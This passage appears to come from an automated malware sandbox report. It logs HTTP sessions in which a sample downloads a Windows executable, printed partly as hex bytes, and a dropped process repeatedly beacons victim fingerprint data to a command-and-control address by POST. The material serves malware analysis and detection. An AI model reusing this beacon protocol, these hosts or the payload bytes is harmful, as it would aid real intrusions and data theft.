                                                                                                                                          286176.111.174.11480192.168.2.449921C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:56.833528042 CEST10190INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:56 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          287176.111.174.11480192.168.2.449919C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:56.859481096 CEST10190INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:56 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          288192.168.2.449922176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:57.058213949 CEST10191OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          289176.111.174.11480192.168.2.449922C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:57.161509037 CEST10192INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:57 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          29176.111.174.11480192.168.2.449762C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:13.946202993 CEST4535INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:13 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          290192.168.2.449924176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:57.366858006 CEST10192OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          291176.111.174.11480192.168.2.449924C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:57.467434883 CEST10193INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:57 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          292192.168.2.449925176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:57.686992884 CEST10193OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          293176.111.174.11480192.168.2.449925C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:57.790180922 CEST10194INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:57 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          294192.168.2.449926176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:58.000787973 CEST10194OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          295176.111.174.11480192.168.2.449926C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:58.098908901 CEST10195INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:58 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          296192.168.2.449928176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:58.303216934 CEST10195OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          297176.111.174.11480192.168.2.449928C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:58.402904987 CEST10196INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:58 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          298192.168.2.449929176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:58.614619970 CEST10196OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          299176.111.174.11480192.168.2.449929C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:58.717684984 CEST10197INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:58 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          389.184.92.21080192.168.2.449744C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:58:52.444783926 CEST4023INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:52 GMT
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Content-Length: 290304
                                                                                                                                          Last-Modified: Wed, 28 Apr 2021 08:31:27 GMT
                                                                                                                                          Connection: keep-alive
                                                                                                                                          ETag: "60891d5f-46e00"
                                                                                                                                          Cache-Control: public, must-revalidate, proxy-revalidate
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 09 df 90 31 68 b1 c3 31 68 b1 c3 31 68 b1 c3 2f 3a 24 c3 2a 68 b1 c3 2f 3a 32 c3 4e 68 b1 c3 2f 3a 35 c3 18 68 b1 c3 16 ae ca c3 36 68 b1 c3 31 68 b0 c3 b5 68 b1 c3 2f 3a 3b c3 30 68 b1 c3 2f 3a 23 c3 30 68 b1 c3 2f 3a 25 c3 30 68 b1 c3 2f 3a 20 c3 30 68 b1 c3 52 69 63 68 31 68 b1 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2e 62 ae 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 38 01 00 00 e2 09 00 00 00 00 00 43 2d 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 0b 00 00 04 00 00 2e ae 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 89 01 00 62 00 00 00 2c 7e 01 00 50 00 00 00 00 30 0a 00 b0 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 52 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 73 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 36 01 00 00 10 00 00 00 38 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 72 39 00 00 00 50 01 00 00 3a 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a8 9a 08 00 00 90 01 00 00 00 02 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 f7 00 00 00 30 0a 00 00 f8 00 00 00 76 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 51 89
                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$u1h1h1h/:$*h/:2Nh/:5h6h1hh/:;0h/:#0h/:%0h/: 0hRich1hPEL.b^8C-P@0.b,~P00R@s@P.text68 `.rdatar9P:<@@.datav@.rsrc0v@@UQ
                                                                                                                                          Apr 28, 2021 22:58:52.444807053 CEST4024INData Raw: 4d fc 8d 45 08 50 8b 4d fc e8 d5 15 00 00 8b 4d fc c7 01 60 52 41 00 8b 45 fc 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 fc c7 00 60 52 41 00 8b 4d fc e8 6d 16 00 00 8b e5 5d c3 cc cc cc cc 55 8b ec 51 89 4d fc
                                                                                                                                          Data Ascii: MEPMM`RAE]UQME`RAMm]UQMMEtMQE]UE]UEPMQUREP]UEMff]UEPMQUREP
                                                                                                                                          Apr 28, 2021 22:58:52.444824934 CEST4026INData Raw: 8b 4d fc e8 09 00 00 00 8b e5 5d c3 cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 4d fc e8 01 03 00 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 89 4d f8 8b 4d 08 e8 2f ff ff ff 3b 45 0c 73 05 e8 70 0e 00 00 8b 4d 08 e8 1d ff
                                                                                                                                          Data Ascii: M]UQMM]UMM/;EspM+EEE;EsMMU;Uu%kAPMMQM\URjMNFjEPMt1URMEPEHQMPBURME]U
                                                                                                                                          Apr 28, 2021 22:58:52.444843054 CEST4027INData Raw: 75 0a 6a 00 8b 4d fc e8 3b ff ff ff 33 c0 3b 45 08 1b c0 f7 d8 8b e5 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 89 4d fc 8b 45 fc 83 78 18 10 72 0b 8b 4d fc 8b 51 04 89 55 f8 eb 09 8b 45 fc 83 c0 04 89 45 f8 8b 45 f8 8b e5
                                                                                                                                          Data Ascii: ujM;3;E]UMExrMQUEEE]UQMM]UQMEPMQUR]UjhXFAdPd%DhkAMEEPMUh|AMQrE
                                                                                                                                          Apr 28, 2021 22:58:52.444861889 CEST4028INData Raw: 51 e8 97 01 00 00 88 45 ff 0f b6 45 ff 50 8b 4d 14 51 8b 55 10 52 8b 45 0c 50 8b 4d 08 51 e8 ca 01 00 00 8b e5 5d c2 10 00 cc cc cc cc 55 8b ec 51 8d 45 0c 50 8d 4d 08 51 e8 5f 01 00 00 83 c4 08 88 45 ff 0f b6 55 ff 52 8b 45 10 50 8b 4d 0c 51 8b
                                                                                                                                          Data Ascii: QEEPMQUREPMQ]UQEPMQ_EUREPMQUR]UQME]U}wE%3usjMh|AEPqMkQ]U}wE%3usjM
                                                                                                                                          Apr 28, 2021 22:58:52.444879055 CEST4030INData Raw: e0 1f c1 e0 06 03 04 8d 80 09 4a 00 eb 05 b8 d0 92 41 00 f6 40 24 80 74 1c e8 54 13 00 00 c7 00 16 00 00 00 56 56 56 56 56 e8 dc 12 00 00 83 c4 14 83 4d e4 ff 39 75 e4 75 13 ff 75 18 ff 75 14 ff 75 10 57 ff 55 08 83 c4 10 89 45 e4 c7 45 fc fe ff
                                                                                                                                          Data Ascii: JA@$tTVVVVVM9uuuuuWUEEE}WwYUEPjuuh;@]UEVW3;tG9}uj^0WWWWWT)9}t9Esj"YPuu73_^]``
                                                                                                                                          Apr 28, 2021 22:58:52.444941998 CEST4031INData Raw: e0 75 6c 8b f0 ff 15 a4 50 41 00 50 e8 e5 0d 00 00 59 89 06 eb 5f 85 ff 0f 85 83 00 00 00 e8 15 0e 00 00 39 7d e0 74 68 c7 00 0c 00 00 00 eb 71 85 f6 75 01 46 56 53 6a 00 ff 35 e0 8d 43 00 ff 15 ec 50 41 00 8b f8 85 ff 75 56 39 05 88 8c 43 00 74
                                                                                                                                          Data Ascii: ulPAPY_9}thquFVSj5CPAuV9Ct4V<YtvV<Y3J|uPAPXYQRAUIYUVEtV4Y^]UEQPIYY@]
                                                                                                                                          Apr 28, 2021 22:58:52.444958925 CEST4032INData Raw: 0c 89 45 e8 8b 45 1c 89 45 ec 8b 45 20 89 45 f0 83 65 f4 00 83 65 f8 00 83 65 fc 00 89 65 f4 89 6d f8 64 a1 00 00 00 00 89 45 d8 8d 45 d8 64 a3 00 00 00 00 c7 45 c8 01 00 00 00 8b 45 08 89 45 cc 8b 45 10 89 45 d0 e8 19 54 00 00 8b 80 80 00 00 00
                                                                                                                                          Data Ascii: EEEE EeeeemdEEdEEEEETEEPE0UYYe}td]dEdE[UQSEH3ME@ftE@$3@ljjEpEpEpjuEpub E
                                                                                                                                          Apr 28, 2021 22:58:52.444989920 CEST4034INData Raw: 40 26 0a 89 78 38 c6 40 34 00 83 c0 40 8b 0d 80 09 4a 00 81 c1 00 08 00 00 3b c1 72 cc 66 39 7d ce 0f 84 0a 01 00 00 8b 45 d0 3b c7 0f 84 ff 00 00 00 8b 38 8d 58 04 8d 04 3b 89 45 e4 be 00 08 00 00 3b fe 7c 02 8b fe c7 45 e0 01 00 00 00 eb 5b 6a
                                                                                                                                          Data Ascii: @&x8@4@J;rf9}E;8X;E;|E[j@j "aYYtVMJ`J *@@``$@%@&`8@4@;rE9=`J|=`Je~mEtVtQtKuQQAt<u
                                                                                                                                          Apr 28, 2021 22:58:52.445027113 CEST4035INData Raw: 0c 3a e8 31 f8 ff ff 8b 45 f4 5f 5e 5b 8b e5 5d c3 c7 45 f4 00 00 00 00 eb c9 8b 4d 08 81 39 63 73 6d e0 75 29 83 3d cc 59 41 00 00 74 20 68 cc 59 41 00 e8 83 61 00 00 83 c4 04 85 c0 74 0f 8b 55 08 6a 01 52 ff 15 cc 59 41 00 83 c4 08 8b 4d 0c e8
                                                                                                                                          Data Ascii: :1E_^[]EM9csmu)=YAt hYAatUjRYAM`E9XthAW`EMHtN38NV3:EH9`9SRhAWQ`UEVFucIFHlHhN;
                                                                                                                                          Apr 28, 2021 22:58:52.517519951 CEST4037INData Raw: ff 83 f8 6e 74 4a 83 f8 63 74 19 83 f8 7b 74 14 ff b5 64 fe ff ff 8d b5 74 fe ff ff e8 7d fc ff ff 59 eb 11 8b 95 64 fe ff ff ff 85 74 fe ff ff e8 50 0c 00 00 89 85 78 fe ff ff 83 f8 ff 0f 84 d1 0b 00 00 8b b5 44 fe ff ff 8b bd 48 fe ff ff 8b 8d
                                                                                                                                          Data Ascii: ntJct{tdt}YdtPxDHLtl\orcjdZ;zg~Eit!ngjtf\x-4`13x-uT


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          30192.168.2.449763176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:14.534195900 CEST4536OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          300192.168.2.449930176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:58.929698944 CEST10197OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          301176.111.174.11480192.168.2.449930C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:59.030653000 CEST10198INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:59 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          302192.168.2.449931176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:59.240889072 CEST10198OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          303176.111.174.11480192.168.2.449931C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:59.345542908 CEST10199INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:59 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
